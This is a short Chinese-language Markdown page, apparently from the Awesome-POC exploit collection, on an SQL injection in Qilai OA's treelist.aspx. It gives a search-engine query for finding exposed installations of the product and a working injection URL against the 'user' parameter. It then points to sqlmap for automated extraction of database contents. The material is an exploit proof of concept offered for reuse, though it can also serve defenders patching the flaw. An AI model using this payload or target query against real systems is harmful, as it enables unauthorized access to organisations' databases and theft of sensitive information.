Awesome-POC/OA产品漏洞/启莱OA treelist.aspx SQL注入漏洞.md
2024-11-06 14:10:36 +08:00

39 lines
572 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 启莱OA treelist.aspx SQL注入漏洞
## 漏洞描述
启莱OA treelist.aspx文件存在SQL注入漏洞攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
```
启莱OA
```
## 网络测绘
```
app="启莱OA"
```
## 漏洞复现
登录页面如下
![qilai-1-1](images/qilai-1-1.png)
存在SQL注入的文件为 treelist.aspx
```plain
http://xxx.xxx.xxx.xxx/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1
```
![qilai-1-2](images/qilai-1-2.png)
使用SQLmap对参数 user 进行注入
![qilai-1-3](images/qilai-1-3.png)